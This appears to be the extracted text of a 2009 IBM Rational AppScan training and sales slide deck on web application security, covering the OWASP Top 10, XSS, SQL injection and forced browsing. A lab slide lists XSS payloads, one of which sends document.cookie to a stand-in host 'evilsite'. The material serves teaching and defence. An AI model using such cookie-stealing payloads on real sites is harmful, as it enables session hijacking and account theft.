®

IBM Software Group

© 2007 IBM Corporation

Rational AppScan & Ounce Products

Presenters Tony Sisson and Frank Sassano

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

2

The Alarming TruthCheckFree • ‘warns 5 million customers after hack’

http://infosecurity.us/?p=5168January 9, 2009

Hannaford Bros. Grocery Chain •‘4 million credit & debit cards exposed’

http://www.cnn.com/2008/US/03/18/retail.data.breach.ap/index.htmlMarch 18, 2008

Montgomery Ward • ‘51,000 customer credit card numbers...’

http://www.scmagazineus.com/Report-Montgomery-Ward-fails-to-alert-victims-of-breach/article/111922/June 27, 2008

Target Stores• ‘Blind users win $6M suite; Target to make website accessible’

http://digg.com/tech_news/Blind_Users_Win_6M_Suit_Target_To_Make_Website_Accessible2008

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

2

The Alarming TruthCheckFree • ‘warns 5 million customers after hack’

http://infosecurity.us/?p=5168January 9, 2009

Hannaford Bros. Grocery Chain •‘4 million credit & debit cards exposed’

http://www.cnn.com/2008/US/03/18/retail.data.breach.ap/index.htmlMarch 18, 2008

Montgomery Ward • ‘51,000 customer credit card numbers...’

http://www.scmagazineus.com/Report-Montgomery-Ward-fails-to-alert-victims-of-breach/article/111922/June 27, 2008

Target Stores• ‘Blind users win $6M suite; Target to make website accessible’

http://digg.com/tech_news/Blind_Users_Win_6M_Suit_Target_To_Make_Website_Accessible2008

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

3

Bad Press Decreases Shareholder Value

One-day market cap drop of $200M

Wednesday, September 16, 2009

IBM Software Group | Rational software

2

Network Server

WebApplications

The Reality: Security and Focus Are Unbalanced

% of Attacks % of Dollars

75% 10%

25%

90%

Security Spending

of All Attacks on Information SecurityAre Directed to the Web Application Layer75%

of All Web Applications Are Vulnerable2/3

Security

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

5

The Myth: “Our Site Is Safe”Security

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

5

We Use Network Vulnerability Scanners

The Myth: “Our Site Is Safe”

We Have Firewalls in Place We Audit It Once a

Quarter with Pen Testers

Security

Wednesday, September 16, 2009

Database

IBM Software Group | Rational software

High Level Web Application Architecture Review

(Presentation) App Server

(Business

Logic)

Client Tier

(Browser)

Middle TierData Tier

Firewall

Internet

3

Wednesday, September 16, 2009

Database

IBM Software Group | Rational software

High Level Web Application Architecture Review

(Presentation) App Server

(Business

Logic)

Client Tier

(Browser)

Middle TierData Tier

Firewall

Customer App is deployed here

Internet

3

Wednesday, September 16, 2009

Database

IBM Software Group | Rational software

High Level Web Application Architecture Review

(Presentation) App Server

(Business

Logic)

Client Tier

(Browser)

Middle TierData Tier

Firewall

Sensitive data is stored

hereCustomer App is deployed here

Internet

3

Wednesday, September 16, 2009

Database

IBM Software Group | Rational software

High Level Web Application Architecture Review

(Presentation) App Server

(Business

Logic)

Client Tier

(Browser)

Middle TierData Tier

Firewall

Sensitive data is stored

here

Protects Network

Customer App is deployed here

Internet

3

Wednesday, September 16, 2009

Database

IBM Software Group | Rational software

High Level Web Application Architecture Review

(Presentation) App Server

(Business

Logic)

Client Tier

(Browser)

Middle TierData Tier

Firewall

Sensitive data is stored

here

SSL

Protects Transport Protects Network

Customer App is deployed here

Internet

3

Wednesday, September 16, 2009

Database

IBM Software Group | Rational software

High Level Web Application Architecture Review

(Presentation) App Server

(Business

Logic)

Client Tier

(Browser)

Middle TierData Tier

Firewall

Sensitive data is stored

here

SSL

Protects Transport Protects Network

Customer App is deployed here

Internet

3

Wednesday, September 16, 2009

IBM Software Group | Rational software

Perimeter IDS IPS

Intrusion

Detection

System

Intrusion

Prevention

System

Network Defenses for Web Applications

App Firewall

Application

Firewall

Firewall

System Incident Event Management (SIEM)

Security

HTTP

Request

designed to (fail securely) by allowing through traffic that they don't understand

4

Wednesday, September 16, 2009

IBM Software Group | Rational softwareIBM Software Group | Rational software

Security Testing Technologies Primer

Static Code Analysis = Whitebox

- Looking at the code for security issues (code-level scanning)

Dynamic Analysis = Blackbox - Sending tests to a functioning application

Total Potential

Security Issues

Dynamic

Analysis

Static

Analysis

6

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

9

Building Security & Compliance into the Software

Build

Developers

SDLC

Developers

Developers

Coding QA Security Production

Enable Security to effectively drive remediation into development

Provides Developers and Testers with expertise on detection and

remediation ability

Ensure vulnerabilities are addressed before applications are put into production

Wednesday, September 16, 2009

IBM Software Group | Rational software

Rational AppScan End-to-End Web Application SecurityREQUIREMENTS CODE BUILD SECURITY PRODUCTIONQA

AppScan Standard

(desktop)

AppScan Tester

(scan agent & clients)

Req’ts Definition

(security templates)

AppScan OnDemand

(SaaS)AppScan Enterprise / Reporting Console

(enterprise-wide scanning and reporting)

Security / compliance testing incorporated into

testing & remediation workflows

Security requirements defined before

design & implementation

Outsourced testing for

security audits & production site

monitoring

Security & Compliance

Testing, oversight,

control, policy, audits

Build security testing into the

IDE*

Application Security Best Practices

Automate Security /

Compliance testing in the Build Process

Ounce Products - Eclipse/VS IDE

Security for the development lifecycle

Security audit solutions for IT Security

Address security from the start

5

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

11

Application Threat Negative Impact Example Impact

Cross-Site® scripting Identity Theft, Sensitive Information Leakage, …

Hackers can impersonate legitimate users, and control their accounts.

Injection Flaws Attacker can manipulate queries to the DB / LDAP / Other system

Hackers can access backend database information, alter it or steal it.

Malicious File Execution Execute shell commands on server, up to full control

Site modified to transfer all interactions to the hacker.

Insecure Direct Object Reference

Attacker can access sensitive files and resources

Web application returns contents of sensitive file (instead of harmless one)

Cross-Site Request Forgery Attacker can invoke “blind” actions on Web applications, impersonating as a trusted user

Blind requests to bank account transfer money to hacker

Information Leakage and Improper Error Handling

Attackers can gain detailed system information

Malicious system reconnaissance may assist in developing further attacks

Broken Authentication & Session Management

Session tokens not guarded or invalidated properly

Hacker can “force” session token on victim; session tokens can be stolen after logout

Insecure Cryptographic Storage

Weak encryption techniques may lead to broken encryption

Confidential information (SSN, Credit Cards) can be decrypted by malicious users

Insecure Communications Sensitive info sent unencrypted over insecure channel

Unencrypted credentials “sniffed” and used by hacker to impersonate user

Failure to Restrict URL Access Hacker can access unauthorized resources

Hacker can forcefully browse and access a page past the login page

Open Web Application Security Project (OWASP) Top10

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

12

Cross-Site Scripting – The Exploit Process

Evil.org

User bank.com

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

12

Cross-Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

12

Cross-Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

12

Cross-Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

12

Cross-Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’s cookie and session information without the user’s consent or knowledge

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

12

Cross-Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’s cookie and session information without the user’s consent or knowledge

5) Evil.org uses stolen session information to impersonate user

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

13

Lab 1Profile Web Application, Steal CookiesThe Goal of this lab is to: profile the demo.testfire.net application utilize a Cross-Site Scripting vulnerability on the

demo.testfire.net application in order to access cookies on a target user’s browser

Search Super Bowl <B>Super Bowl</B> <script>alert(1)</script> <script>alert(document.cookie)</script> Tamperdata - for gathering the Cookie information to send to Grandma!

– SEARCH - <script>document.write('<img src=http://evilsite/'+document.cookie);</script>

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

14

SQL Injection Example

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

15

SQL Injection Example

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

16

SQL Injection Example - Exploit

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

17

SQL Injection Example - Outcome

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

18

Information Leakage – Different User/Pass Error

verbose login error messages

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

19

Failure to Restrict URL Access - Admin User loginPrivilege Escalation Example

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

19

Failure to Restrict URL Access - Admin User loginPrivilege Escalation Example

/admin/admin.aspx

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

20

Forcefully browse to admin page

Wednesday, September 16, 2009

IBM Software Group | Rational

IBM Confidential21

AppScan’s HTTP-Based Malware Scanning

1. Discover all content and links in a Web Application

– Execute JavaScript & Flash

– Fill forms and login sequences

– Analyze secure pages– …

Wednesday, September 16, 2009

IBM Software Group | Rational

IBM Confidential21

AppScan’s HTTP-Based Malware Scanning

1. Discover all content and links in a Web Application

– Execute JavaScript & Flash

– Fill forms and login sequences

– Analyze secure pages– …

Wednesday, September 16, 2009

IBM Software Group | Rational

IBM Confidential21

AppScan’s HTTP-Based Malware Scanning

1. Discover all content and links in a Web Application

– Execute JavaScript & Flash

– Fill forms and login sequences

– Analyze secure pages– …

2. Analyze all content for malicious behavior indicators

3. Compare all links to comprehensive black-lists

Wednesday, September 16, 2009

IBM Software Group | Rational

IBM Confidential21

link1

link2

link3

AppScan’s HTTP-Based Malware Scanning

1. Discover all content and links in a Web Application

– Execute JavaScript & Flash

– Fill forms and login sequences

– Analyze secure pages– …

2. Analyze all content for malicious behavior indicators

3. Compare all links to comprehensive black-lists

Wednesday, September 16, 2009

IBM Software Group | Rational

IBM Confidential21

link1

link2

link3

AppScan’s HTTP-Based Malware Scanning

1. Discover all content and links in a Web Application

– Execute JavaScript & Flash

– Fill forms and login sequences

– Analyze secure pages– …

2. Analyze all content for malicious behavior indicators

3. Compare all links to comprehensive black-lists

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

22

Introducing expanded Rational

AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large)

The Result: Ability to address online risk without in-house resources with the faster route to actionable information

AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may

have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

22

Introducing expanded Rational

AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large)

The Result: Ability to address online risk without in-house resources with the faster route to actionable information

AppScan/Policy Tester OnDemand

AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may

have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans

Wednesday, September 16, 2009

© 2008 IBM Corporation

IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software

The Impact of Securing Flash-based Applications

• Flash one of the fastest growing security problemsPractically in every web application

• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation

Wednesday, September 16, 2009

© 2008 IBM Corporation

IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software

The Impact of Securing Flash-based Applications

• Flash one of the fastest growing security problemsPractically in every web application

• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation

Wednesday, September 16, 2009

© 2008 IBM Corporation

IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software

The Impact of Securing Flash-based Applications

• Flash one of the fastest growing security problemsPractically in every web application

• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation

Flex “Next-Generation” of Flash

Wednesday, September 16, 2009

© 2008 IBM Corporation

IBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational softwareIBM Software Group | Watchfire SolutionsIBM Software Group | Rational softwareIBM Software Group | Rational software

The Impact of Securing Flash-based Applications

• Flash one of the fastest growing security problemsPractically in every web application

• Flash vulnerabilities: Cross-Site FlashingCross-Site Scripting through FlashPhishingFlow Manipulation

Flex “Next-Generation” of Flash

“Marketing” Flash BannerCompromises the entire

web application

Wednesday, September 16, 2009

IBM Software Group | Rational software

7

Wednesday, September 16, 2009

IBM Software Group | Rational software

8

Wednesday, September 16, 2009

IBM Software Group | Rational software

9

Wednesday, September 16, 2009

IBM Software Group | Rational software

9

Wednesday, September 16, 2009

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

28

Wednesday, September 16, 2009